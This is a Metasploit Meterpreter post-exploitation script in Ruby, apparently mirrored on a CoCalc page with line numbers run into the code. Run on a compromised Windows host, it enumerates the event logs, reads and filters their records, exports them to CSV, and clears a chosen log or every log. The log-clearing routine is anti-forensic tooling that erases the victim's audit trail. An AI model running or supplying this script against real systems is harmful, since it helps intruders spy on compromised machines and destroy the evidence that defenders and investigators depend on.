CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/scripts/meterpreter/event_manager.rb
Views: 1904
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678# Author: Carlos Perez at carlos_perez[at]darkoperator.com9#-------------------------------------------------------------------------------10################## Variable Declarations ##################11@client = client12eventlog_name = nil13print_logs = false14list_logs = false15clear_logs = false16local_log = false17local_log_path = nil18supress_print = false19filter = '\d*'20filter_string = "*"21meter_type = client.platform22opts = Rex::Parser::Arguments.new(23"-h" => [ false, "Help menu" ],24"-i" => [ false, "Show information about Event Logs on the System and their configuration"],25"-l" => [ true, "List a given Event Log."],26"-c" => [ true, "Clear a given Event Log (or ALL if no argument specified)"],27"-f" => [ true, "Event ID to filter events on"],28"-s" => [ true, "Save logs to local CSV file, optionally specify alternate folder in which to save logs"],29"-p" => [ false, "Suppress printing filtered logs to screen"]30)313233################## Function Declarations ##################3435# Usage Message Function36#-------------------------------------------------------------------------------37def usage(opts)38print_line "Meterpreter Script for Windows Event Log Query and Clear."39print_line(opts.usage)40raise Rex::Script::Completed41end4243# Wrong Meterpreter Version Message Function44#-------------------------------------------------------------------------------45def wrong_meter_version(meter = meter_type)46print_error("#{meter} version of Meterpreter is not supported with this script!")47raise Rex::Script::Completed48end4950# Function for Enumerating EventLogs51#-------------------------------------------------------------------------------52def get_log_details53logs_detail = Array.new5455eventlog_list.each do |log_name|5657# Create a hash to store the log info in (and throw default info in)58log_detail = Hash.new59log_detail[:name] = log_name60log_detail[:retention] = "Disabled"61log_detail[:size] = 062log_detail[:number_of_records] = 06364key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"65if @client.sys.config.sysinfo['OS'] =~ /Windows 2003|.Net|XP|2000/66key = "#{key}Eventlog"67else68key = "#{key}eventlog"69end7071begin72unless (registry_getvaldata("#{key}\\#{log_name}","Retention") == 0) then log_detail[:retention] = "Disabled" end73log_detail[:size] = registry_getvaldata("#{key}\\#{log_name}","MaxSize")7475# Open the event log76eventlog = @client.sys.eventlog.open(log_name)77log_detail[:num_of_records] = eventlog.length78rescue79log_detail[:num_of_records] = "Access Denied"80end818283logs_detail << log_detail84end8586return logs_detail87end888990# Function for Printing Event Log Details91#-------------------------------------------------------------------------------92def print_log_details93print_status("Retrieving Event Log Configuration")94tbl = Rex::Text::Table.new(95'Header' => "Event Logs on System",96'Indent' => 1,97'Columns' => [98"Name",99"Retention",100"Maximum Size",101"Records"102])103104eventlog_details = get_log_details105106eventlog_details.each do |log_detail|107tbl << [log_detail[:name],log_detail[:retention],"#{log_detail[:size]}K",log_detail[:num_of_records]]108end109110print_line("\n" + tbl.to_s + "\n")111end112113114# Function for doings queries of EventLogs115#-------------------------------------------------------------------------------116def list_logs(eventlog_name,filter,filter_string,logs,local_log,sup_print)117begin118event_data = ""119csv_data = "EventID,Date,Data\n"120log = @client.sys.eventlog.open(eventlog_name)121log.each_backwards do |e|122if e.eventid.to_s =~ /#{filter}/123if not sup_print124print_status("EventID: #{e.eventid}")125print_status("Date: #{e.generated}")126print_status("Data:")127e.strings.each do |l|128l.split("\r\n").each do |ml|129print_status("\t#{ml.chomp}")130event_data << " #{ml.chomp}"131end132end133print_status134end135csv_data << "#{e.eventid},#{e.generated},\"#{event_data}\"\n"136event_data = ""137end138end139rescue140print_error("Failed to Open Event Log #{eventlog_name}")141raise Rex::Script::Completed142end143144if local_log145log_file = File.join(logs, "#{eventlog_name}.csv")146print_good("CSV File saved to #{log_file}")147file_local_write(log_file,csv_data)148end149end150151# Function for clearing EventLogs152#-------------------------------------------------------------------------------153def clear_logs(log_name=nil)154log_names = []155if log_name.nil?156log_names = eventlog_list157else158log_names << log_name159end160161log_names.each do |name|162begin163print_status("Clearing #{name}")164event_log = @client.sys.eventlog.open(name)165event_log.clear166print_status("Event Log #{name} Cleared!")167rescue168print_error("Failed to Clear #{name}, Access Denied")169end170end171172return log_names173end174175################## Main ##################176opts.parse(args) { |opt, idx, val|177case opt178when "-h"179usage(opts)180when "-i"181print_logs = true182print_log_details183raise Rex::Script::Completed184when "-c"185clear_logs = true186eventlog_name = val187when "-l"188list_logs = true189eventlog_name = val190when "-f"191filter = val192when "-s"193local_log = true194if File.directory?(val)195local_log_path = val196else197print_error("Log folder #{val} does not exist!")198raise Rex::Script::Completed199end200when "-p"201supress_print = true202end203}204205# Check for Version of Meterpreter206wrong_meter_version(meter_type) if meter_type != 'windows'207208# Print usage & exit if the user didn't specify an action209# to default to just running for all logs)210if !list_logs and !clear_logs and !print_logs211usage(opts)212end213214# Log Folder Creation215#-----------------------------------------------------------------------216#Get Hostname217host = @client.sys.config.sysinfo["Computer"]218219# Create Filename info to be appended to downloaded files220filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")221222# Create a directory for any local logging if the user desires223if local_log224if local_log_path225logs = ::File.join(local_log_path, Rex::FileUtils.clean_path(host + filenameinfo) )226else227logs = ::File.join(Msf::Config.log_directory, "scripts", 'event_manager', Rex::FileUtils.clean_path(host + filenameinfo) )228end229230::FileUtils.mkdir_p(logs)231end232233# List the logs if the user desires234if list_logs and eventlog_name235list_logs(eventlog_name,filter,filter_string,logs,local_log,supress_print)236else237print_error("You must specify and eventlog to query!")238end239240241# Finally, clear the specified logs if the user desires242if clear_logs243if eventlog_name244clear_logs(eventlog_name)245else246eventlog_list.each do |eventlog_name|247print_status eventlog_name + ": "248clear_logs(eventlog_name)249end250end251end252253254